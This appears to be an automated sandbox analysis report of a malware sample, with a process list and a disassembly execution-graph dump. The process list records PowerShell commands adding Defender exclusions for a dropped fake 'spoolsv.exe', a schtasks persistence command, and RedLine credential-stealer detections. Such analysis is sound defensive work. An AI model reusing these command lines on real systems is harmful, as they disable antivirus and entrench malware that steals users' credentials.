                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                                                                                      Start time:10:32:41
                                                                                                                                                                                                                                                      Start date:08/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\spoolsv.exe'
                                                                                                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                                                                      Start time:10:32:41
                                                                                                                                                                                                                                                      Start date:08/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                                                      Start time:10:32:56
                                                                                                                                                                                                                                                      Start date:08/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'spoolsv.exe'
                                                                                                                                                                                                                                                      Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                                                      Start time:10:32:56
                                                                                                                                                                                                                                                      Start date:08/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:20
                                                                                                                                                                                                                                                      Start time:10:33:17
                                                                                                                                                                                                                                                      Start date:08/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "spoolsv" /tr "C:\Users\user~1\AppData\Local\Temp\spoolsv.exe"
                                                                                                                                                                                                                                                      Imagebase:0x7ff7d5720000
                                                                                                                                                                                                                                                      File size:235'008 bytes
                                                                                                                                                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                                                                      Start time:10:33:17
                                                                                                                                                                                                                                                      Start date:08/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                                                                                      Start time:10:33:19
                                                                                                                                                                                                                                                      Start date:08/12/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\spoolsv.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\spoolsv.exe
                                                                                                                                                                                                                                                      Imagebase:0x9e0000
                                                                                                                                                                                                                                                      File size:138'752 bytes
                                                                                                                                                                                                                                                      MD5 hash:FCFAE4FDCC273F8A46C51D49FA8A4A03
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:23
                                                                                                                                                                                                                                                      Start time:10:33:27
                                                                                                                                                                                                                                                      Start date:08/12/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\spoolsv.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\spoolsv.exe"
                                                                                                                                                                                                                                                      Imagebase:0xcb0000
                                                                                                                                                                                                                                                      File size:138'752 bytes
                                                                                                                                                                                                                                                      MD5 hash:FCFAE4FDCC273F8A46C51D49FA8A4A03
                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:24
                                                                                                                                                                                                                                                      Start time:10:33:35
                                                                                                                                                                                                                                                      Start date:08/12/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\spoolsv.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\spoolsv.exe"
                                                                                                                                                                                                                                                      Imagebase:0xd90000
                                                                                                                                                                                                                                                      File size:138'752 bytes
                                                                                                                                                                                                                                                      MD5 hash:FCFAE4FDCC273F8A46C51D49FA8A4A03
                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:25
                                                                                                                                                                                                                                                      Start time:10:34:01
                                                                                                                                                                                                                                                      Start date:08/12/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\spoolsv.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\spoolsv.exe
                                                                                                                                                                                                                                                      Imagebase:0x7f0000
                                                                                                                                                                                                                                                      File size:138'752 bytes
                                                                                                                                                                                                                                                      MD5 hash:FCFAE4FDCC273F8A46C51D49FA8A4A03
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:27
                                                                                                                                                                                                                                                      Start time:10:34:23
                                                                                                                                                                                                                                                      Start date:08/12/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\attzwu.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\attzwu.exe"
                                                                                                                                                                                                                                                      Imagebase:0xe20000
                                                                                                                                                                                                                                                      File size:307'712 bytes
                                                                                                                                                                                                                                                      MD5 hash:DFEFDD2E554FD23F3B87F68C3E0F9622
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000000.2540965621.0000000000E22000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Target ID:28
                                                                                                                                                                                                                                                      Start time:10:35:00
                                                                                                                                                                                                                                                      Start date:08/12/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\spoolsv.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\spoolsv.exe
                                                                                                                                                                                                                                                      Imagebase:0x7ff644d60000
                                                                                                                                                                                                                                                      File size:138'752 bytes
                                                                                                                                                                                                                                                      MD5 hash:FCFAE4FDCC273F8A46C51D49FA8A4A03
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:7.9%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                        Signature Coverage:3.2%
                                                                                                                                                                                                                                                        Total number of Nodes:916
                                                                                                                                                                                                                                                        Total number of Limit Nodes:20
                                                                                                                                                                                                                                                        execution_graph 12473 7ffb08151000 12480 7ffb08151120 12473->12480 12476 7ffb08151036 12479 7ffb08151048 12476->12479 12486 7ffb081567b0 12476->12486 12498 7ffb081568ec 12480->12498 12483 7ffb08151c00 13217 7ffb08151a90 12483->13217 12487 7ffb081567ce 12486->12487 12488 7ffb081567e3 12486->12488 12489 7ffb08158b50 _get_daylight 15 API calls 12487->12489 12490 7ffb081567de 12488->12490 13238 7ffb0815a780 EnterCriticalSection 12488->13238 12492 7ffb081567d3 12489->12492 12490->12479 12494 7ffb08158800 _invalid_parameter_noinfo 31 API calls 12492->12494 12493 7ffb081567f9 12495 7ffb0815672c 60 API calls 12493->12495 12494->12490 12496 7ffb08156802 12495->12496 12497 7ffb0815a78c _vfwprintf_l LeaveCriticalSection 12496->12497 12497->12490 12499 7ffb0815681c 12498->12499 12500 7ffb08156840 12499->12500 12503 7ffb0815686e 12499->12503 12529 7ffb08158b50 12500->12529 12502 7ffb08156845 12532 7ffb08158800 12502->12532 12505 7ffb08156880 12503->12505 12506 7ffb08156873 12503->12506 12517 7ffb0815ad60 12505->12517 12508 7ffb08158b50 _get_daylight 15 API calls 12506->12508 12507 7ffb08151018 12507->12476 12507->12483 12508->12507 12511 7ffb081568a1 12524 7ffb0815b37c 12511->12524 12512 7ffb08156894 12514 7ffb08158b50 _get_daylight 15 API calls 12512->12514 12514->12507 12515 7ffb081568b5 12535 7ffb0815a78c LeaveCriticalSection 12515->12535 12536 7ffb0815b604 EnterCriticalSection 12517->12536 12519 7ffb0815ad77 12520 7ffb0815ae00 18 API calls 12519->12520 12521 7ffb0815ad82 12520->12521 12522 7ffb0815b658 abort LeaveCriticalSection 12521->12522 12523 7ffb0815688a 12522->12523 12523->12511 12523->12512 12537 7ffb0815b0e0 12524->12537 12528 7ffb0815b3d6 12528->12515 12530 7ffb08159668 _get_daylight 15 API calls 12529->12530 12531 7ffb08158b59 12530->12531 12531->12502 13210 7ffb08158758 12532->13210 12538 7ffb0815b112 12537->12538 12538->12538 12545 7ffb0815b29d 12538->12545 12552 7ffb081611e8 12538->12552 12539 7ffb08158b50 _get_daylight 15 API calls 12540 7ffb0815b362 12539->12540 12541 7ffb08158800 _invalid_parameter_noinfo 31 API calls 12540->12541 12542 7ffb0815b2a6 12541->12542 12542->12528 12549 7ffb081619e8 12542->12549 12544 7ffb0815b2fc 12544->12545 12546 7ffb081611e8 43 API calls 12544->12546 12545->12539 12545->12542 12547 7ffb0815b31f 12546->12547 12547->12545 12548 7ffb081611e8 43 API calls 12547->12548 12548->12545 12768 7ffb08161314 12549->12768 12553 7ffb081611f6 12552->12553 12556 7ffb08161223 12552->12556 12554 7ffb081611fb 12553->12554 12553->12556 12555 7ffb08158b50 _get_daylight 15 API calls 12554->12555 12558 7ffb08161200 12555->12558 12566 7ffb0816128e 12556->12566 12569 7ffb08153a88 12556->12569 12560 7ffb08158800 _invalid_parameter_noinfo 31 API calls 12558->12560 12562 7ffb0816120b 12560->12562 12561 7ffb0816127e 12563 7ffb08158b50 _get_daylight 15 API calls 12561->12563 12562->12544 12564 7ffb08161283 12563->12564 12565 7ffb08158800 _invalid_parameter_noinfo 31 API calls 12564->12565 12565->12566 12566->12544 12567 7ffb0815892c 43 API calls _fread_nolock 12568 7ffb08161290 12567->12568 12568->12566 12568->12567 12570 7ffb08153a9e 12569->12570 12571 7ffb08153aa3 12569->12571 12570->12561 12570->12568 12571->12570 12577 7ffb081595d4 GetLastError 12571->12577 12573 7ffb08153ac0 12597 7ffb08159768 12573->12597 12578 7ffb081595f1 12577->12578 12579 7ffb081595f6 12577->12579 12605 7ffb0815b910 12578->12605 12583 7ffb0815963f 12579->12583 12610 7ffb08157b68 12579->12610 12585 7ffb0815965a SetLastError 12583->12585 12586 7ffb08159644 SetLastError 12583->12586 12584 7ffb08159615 12617 7ffb08157a10 12584->12617 12633 7ffb08157b10 12585->12633 12586->12573 12592 7ffb0815961c 12592->12585 12593 7ffb08159633 12628 7ffb08159340 12593->12628 12598 7ffb0815977d 12597->12598 12600 7ffb08153ae4 12597->12600 12598->12600 12744 7ffb0815dd80 12598->12744 12601 7ffb0815979c 12600->12601 12602 7ffb081597b1 12601->12602 12603 7ffb081597c4 12601->12603 12602->12603 12756 7ffb0815c974 12602->12756 12603->12570 12642 7ffb0815b674 12605->12642 12608 7ffb0815b952 TlsGetValue 12609 7ffb0815b943 12608->12609 12609->12579 12615 7ffb08157b79 __vcrt_getptd_noexit 12610->12615 12611 7ffb08157bca 12614 7ffb08158b50 _get_daylight 14 API calls 12611->12614 12612 7ffb08157bae HeapAlloc 12613 7ffb08157bc8 12612->12613 12612->12615 12613->12584 12623 7ffb0815b968 12613->12623 12614->12613 12615->12611 12615->12612 12651 7ffb0815d048 12615->12651 12618 7ffb08157a15 HeapFree 12617->12618 12622 7ffb08157a45 __free_lconv_num 12617->12622 12619 7ffb08157a30 12618->12619 12618->12622 12620 7ffb08158b50 _get_daylight 13 API calls 12619->12620 12621 7ffb08157a35 GetLastError 12620->12621 12621->12622 12622->12592 12624 7ffb0815b674 __vcrt_uninitialize_ptd 5 API calls 12623->12624 12625 7ffb0815b99b 12624->12625 12626 7ffb0815b9b5 TlsSetValue 12625->12626 12627 7ffb0815962c 12625->12627 12626->12627 12627->12584 12627->12593 12659 7ffb081592c0 12628->12659 12673 7ffb0815d104 12633->12673 12636 7ffb08157b28 12638 7ffb08157b31 IsProcessorFeaturePresent 12636->12638 12641 7ffb08157b5a abort 12636->12641 12639 7ffb08157b3f 12638->12639 12699 7ffb081585f4 12639->12699 12643 7ffb0815b6d0 12642->12643 12646 7ffb0815b6d5 12642->12646 12644 7ffb0815b6fd LoadLibraryExW 12643->12644 12643->12646 12649 7ffb0815b782 12643->12649 12650 7ffb0815b767 FreeLibrary 12643->12650 12644->12643 12647 7ffb0815b71e GetLastError 12644->12647 12645 7ffb0815b790 GetProcAddress 12645->12646 12646->12608 12646->12609 12647->12643 12648 7ffb0815b729 LoadLibraryExW 12647->12648 12648->12643 12649->12645 12649->12646 12650->12643 12654 7ffb0815d088 12651->12654 12655 7ffb0815b604 abort EnterCriticalSection 12654->12655 12656 7ffb0815d095 12655->12656 12657 7ffb0815b658 abort LeaveCriticalSection 12656->12657 12658 7ffb0815d05a 12657->12658 12658->12615 12671 7ffb0815b604 EnterCriticalSection 12659->12671 12707 7ffb0815d0bc 12673->12707 12676 7ffb0815d154 12677 7ffb0815d181 12676->12677 12679 7ffb0815d1fe 12676->12679 12677->12679 12682 7ffb0815d199 12677->12682 12712 7ffb08159668 GetLastError 12677->12712 12681 7ffb0815d266 12679->12681 12732 7ffb0815b604 EnterCriticalSection 12679->12732 12685 7ffb0815d2fd 12681->12685 12690 7ffb0815d2af abort 12681->12690 12733 7ffb0815b658 LeaveCriticalSection 12681->12733 12682->12679 12683 7ffb0815d1a6 12682->12683 12698 7ffb0815d1b5 12682->12698 12686 7ffb08158b50 _get_daylight 15 API calls 12683->12686 12684 7ffb0815d370 12693 7ffb081595d4 abort 35 API calls 12684->12693 12696 7ffb0815d388 12684->12696 12684->12698 12685->12684 12734 7ffb0815b658 LeaveCriticalSection 12685->12734 12689 7ffb0815d1f1 12686->12689 12691 7ffb08158800 _invalid_parameter_noinfo 31 API calls 12689->12691 12690->12685 12692 7ffb081595d4 abort 35 API calls 12690->12692 12691->12698 12694 7ffb0815d2ea 12692->12694 12693->12696 12695 7ffb081595d4 abort 35 API calls 12694->12695 12695->12685 12697 7ffb081595d4 abort 35 API calls 12696->12697 12696->12698 12697->12698 12698->12636 12700 7ffb0815862e __scrt_fastfail abort 12699->12700 12701 7ffb08158656 RtlCaptureContext RtlLookupFunctionEntry 12700->12701 12702 7ffb08158690 RtlVirtualUnwind 12701->12702 12703 7ffb081586c6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12701->12703 12702->12703 12706 7ffb08158718 abort 12703->12706 12705 7ffb08158737 12705->12641 12735 7ffb08164990 12706->12735 12708 7ffb0815b604 abort EnterCriticalSection 12707->12708 12709 7ffb0815d0d5 12708->12709 12710 7ffb0815b658 abort LeaveCriticalSection 12709->12710 12711 7ffb08157b19 12710->12711 12711->12636 12711->12676 12713 7ffb0815968c 12712->12713 12714 7ffb08159699 12712->12714 12715 7ffb0815b910 abort 6 API calls 12713->12715 12716 7ffb08157b68 __vcrt_getptd_noexit 12 API calls 12714->12716 12717 7ffb08159691 12715->12717 12718 7ffb081596a8 12716->12718 12717->12714 12719 7ffb081596da 12717->12719 12720 7ffb081596b0 12718->12720 12721 7ffb0815b968 abort 6 API calls 12718->12721 12722 7ffb081596df SetLastError 12719->12722 12723 7ffb081596e9 SetLastError 12719->12723 12724 7ffb08157a10 __free_lconv_num 12 API calls 12720->12724 12725 7ffb081596c7 12721->12725 12726 7ffb081596f4 12722->12726 12723->12726 12727 7ffb081596b7 12724->12727 12725->12720 12728 7ffb081596ce 12725->12728 12726->12682 12727->12722 12729 7ffb08159340 abort 12 API calls 12728->12729 12730 7ffb081596d3 12729->12730 12731 7ffb08157a10 __free_lconv_num 12 API calls 12730->12731 12731->12719 12736 7ffb0816499a 12735->12736 12737 7ffb081649e8 IsProcessorFeaturePresent 12736->12737 12738 7ffb081649a6 12736->12738 12739 7ffb081649ff 12737->12739 12738->12705 12740 7ffb08164bdc capture_previous_context RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 12739->12740 12741 7ffb08164a12 12740->12741 12742 7ffb081649b4 __raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12741->12742 12743 7ffb08164ab4 12742->12743 12743->12705 12745 7ffb081595d4 abort 35 API calls 12744->12745 12746 7ffb0815dd8f 12745->12746 12754 7ffb0815dde1 12746->12754 12755 7ffb0815b604 EnterCriticalSection 12746->12755 12754->12600 12757 7ffb081595d4 abort 35 API calls 12756->12757 12758 7ffb0815c983 12757->12758 12759 7ffb0815c99e 12758->12759 12767 7ffb0815b604 EnterCriticalSection 12758->12767 12761 7ffb08157b10 abort 35 API calls 12759->12761 12764 7ffb0815ca24 12759->12764 12761->12764 12764->12603 12769 7ffb08161338 12768->12769 12773 7ffb08161350 12768->12773 12770 7ffb08158b50 _get_daylight 15 API calls 12769->12770 12771 7ffb0816133d 12770->12771 12774 7ffb08158800 _invalid_parameter_noinfo 31 API calls 12771->12774 12772 7ffb0816137d 12779 7ffb08161958 12772->12779 12773->12769 12773->12772 12777 7ffb08161349 12774->12777 12777->12528 12787 7ffb0815b418 12779->12787 12782 7ffb081613a5 12782->12777 12786 7ffb081603ec LeaveCriticalSection 12782->12786 12785 7ffb08157a10 __free_lconv_num 15 API calls 12785->12782 12788 7ffb0815b43d 12787->12788 12789 7ffb0815b454 12787->12789 12790 7ffb08158b50 _get_daylight 15 API calls 12788->12790 12789->12788 12791 7ffb0815b459 12789->12791 12792 7ffb0815b442 12790->12792 12851 7ffb0815b814 12791->12851 12794 7ffb08158800 _invalid_parameter_noinfo 31 API calls 12792->12794 12796 7ffb0815b44d 12794->12796 12796->12782 12808 7ffb08161a1c 12796->12808 12797 7ffb0815b48c GetLastError 12854 7ffb08158ae0 12797->12854 12798 7ffb0815b49b 12859 7ffb08157a50 12798->12859 12802 7ffb0815b4ae MultiByteToWideChar 12803 7ffb0815b4ce GetLastError 12802->12803 12804 7ffb0815b4db 12802->12804 12806 7ffb08158ae0 _vfwprintf_l 15 API calls 12803->12806 12805 7ffb08157a10 __free_lconv_num 15 API calls 12804->12805 12807 7ffb0815b4f3 12805->12807 12806->12804 12807->12796 12866 7ffb08161688 12808->12866 12811 7ffb08161a90 12922 7ffb08158b30 12811->12922 12812 7ffb08161aa7 12886 7ffb08160410 12812->12886 12821 7ffb08158b50 _get_daylight 15 API calls 12824 7ffb081619c6 12821->12824 12824->12785 12842 7ffb08161cc0 12951 7ffb0815aca4 12842->12951 12843 7ffb08161cd2 12843->12824 12845 7ffb08161d55 CloseHandle CreateFileW 12843->12845 12846 7ffb08161d9f GetLastError 12845->12846 12850 7ffb08161dcd 12845->12850 12847 7ffb08158ae0 _vfwprintf_l 15 API calls 12846->12847 12848 7ffb08161dac 12847->12848 12966 7ffb08160540 12848->12966 12850->12824 12852 7ffb0815b674 __vcrt_uninitialize_ptd 5 API calls 12851->12852 12853 7ffb0815b45e MultiByteToWideChar 12852->12853 12853->12797 12853->12798 12855 7ffb08159668 _get_daylight 15 API calls 12854->12855 12856 7ffb08158af1 12855->12856 12857 7ffb08159668 _get_daylight 15 API calls 12856->12857 12858 7ffb08158b0a __free_lconv_num 12857->12858 12858->12796 12860 7ffb08157a9b 12859->12860 12864 7ffb08157a5f __vcrt_getptd_noexit 12859->12864 12862 7ffb08158b50 _get_daylight 15 API calls 12860->12862 12861 7ffb08157a82 HeapAlloc 12863 7ffb08157a99 12861->12863 12861->12864 12862->12863 12863->12802 12863->12804 12864->12860 12864->12861 12865 7ffb0815d048 __vcrt_getptd_noexit 2 API calls 12864->12865 12865->12864 12867 7ffb081616b4 12866->12867 12875 7ffb081616ce 12866->12875 12868 7ffb08158b50 _get_daylight 15 API calls 12867->12868 12867->12875 12869 7ffb081616c3 12868->12869 12870 7ffb08158800 _invalid_parameter_noinfo 31 API calls 12869->12870 12870->12875 12871 7ffb0816179c 12882 7ffb081617fc 12871->12882 12975 7ffb08162fb0 12871->12975 12872 7ffb0816174b 12872->12871 12874 7ffb08158b50 _get_daylight 15 API calls 12872->12874 12877 7ffb08161791 12874->12877 12875->12872 12878 7ffb08158b50 _get_daylight 15 API calls 12875->12878 12880 7ffb08158800 _invalid_parameter_noinfo 31 API calls 12877->12880 12881 7ffb08161740 12878->12881 12879 7ffb0816187b 12981 7ffb08158820 12879->12981 12880->12871 12884 7ffb08158800 _invalid_parameter_noinfo 31 API calls 12881->12884 12882->12811 12882->12812 12884->12872 12985 7ffb0815b604 EnterCriticalSection 12886->12985 12923 7ffb08159668 _get_daylight 15 API calls 12922->12923 12924 7ffb08158b39 12923->12924 12924->12821 12926 7ffb0816159b 12926->12842 12926->12843 12937 7ffb08161596 12940 7ffb08158b50 _get_daylight 15 API calls 12937->12940 12940->12926 12952 7ffb081605fc 31 API calls 12951->12952 12955 7ffb0815acb8 12952->12955 12953 7ffb0815acbe 12954 7ffb08160540 16 API calls 12953->12954 12960 7ffb0815ad20 12954->12960 12955->12953 12957 7ffb081605fc 31 API calls 12955->12957 12965 7ffb0815acf8 12955->12965 12956 7ffb081605fc 31 API calls 12958 7ffb0815ad04 CloseHandle 12956->12958 12961 7ffb0815aceb 12957->12961 12958->12953 12962 7ffb0815ad11 GetLastError 12958->12962 12959 7ffb0815ad4c 12959->12824 12960->12959 12963 7ffb08158ae0 _vfwprintf_l 15 API calls 12960->12963 12964 7ffb081605fc 31 API calls 12961->12964 12962->12953 12963->12959 12964->12965 12965->12953 12965->12956 12967 7ffb0816055c 12966->12967 12968 7ffb081605ce 12966->12968 12967->12968 12974 7ffb0816058f 12967->12974 12969 7ffb08158b50 _get_daylight 15 API calls 12968->12969 12970 7ffb081605d3 12969->12970 12971 7ffb08158b30 _vfwprintf_l 15 API calls 12970->12971 12972 7ffb081605c0 12971->12972 12972->12850 12973 7ffb081605b8 SetStdHandle 12973->12972 12974->12972 12974->12973 12976 7ffb081617f8 12975->12976 12977 7ffb08162fb9 12975->12977 12976->12879 12976->12882 12978 7ffb08158b50 _get_daylight 15 API calls 12977->12978 12979 7ffb08162fbe 12978->12979 12980 7ffb08158800 _invalid_parameter_noinfo 31 API calls 12979->12980 12980->12976 12982 7ffb0815882e 12981->12982 12983 7ffb081585f4 abort 14 API calls 12982->12983 12984 7ffb0815884d GetCurrentProcess TerminateProcess 12983->12984 13185 7ffb08160d34 13186 7ffb08160d5d 13185->13186 13187 7ffb08160d75 13185->13187 13188 7ffb08158b30 _vfwprintf_l 15 API calls 13186->13188 13189 7ffb08160ded 13187->13189 13194 7ffb08160da8 13187->13194 13190 7ffb08160d62 13188->13190 13191 7ffb08158b30 _vfwprintf_l 15 API calls 13189->13191 13192 7ffb08158b50 _get_daylight 15 API calls 13190->13192 13193 7ffb08160df2 13191->13193 13197 7ffb08160d6a 13192->13197 13195 7ffb08158b50 _get_daylight 15 API calls 13193->13195 13209 7ffb08160308 EnterCriticalSection 13194->13209 13198 7ffb08160dfa 13195->13198 13197->12926 13197->12937 13197->13185 13200 7ffb08158800 _invalid_parameter_noinfo 31 API calls 13198->13200 13199 7ffb08160daf 13201 7ffb08160dbe 13199->13201 13202 7ffb08160dd3 13199->13202 13200->13197 13203 7ffb08158b50 _get_daylight 15 API calls 13201->13203 13204 7ffb08160e20 _vfwprintf_l 55 API calls 13202->13204 13205 7ffb08160dc3 13203->13205 13207 7ffb08160dce 13204->13207 13206 7ffb08158b30 _vfwprintf_l 15 API calls 13205->13206 13206->13207 13208 7ffb081603ec _vfwprintf_l LeaveCriticalSection 13207->13208 13208->13197 13211 7ffb08159668 _get_daylight 15 API calls 13210->13211 13212 7ffb08158782 13211->13212 13213 7ffb08158820 _invalid_parameter_noinfo 16 API calls 13212->13213 13214 7ffb081587fe 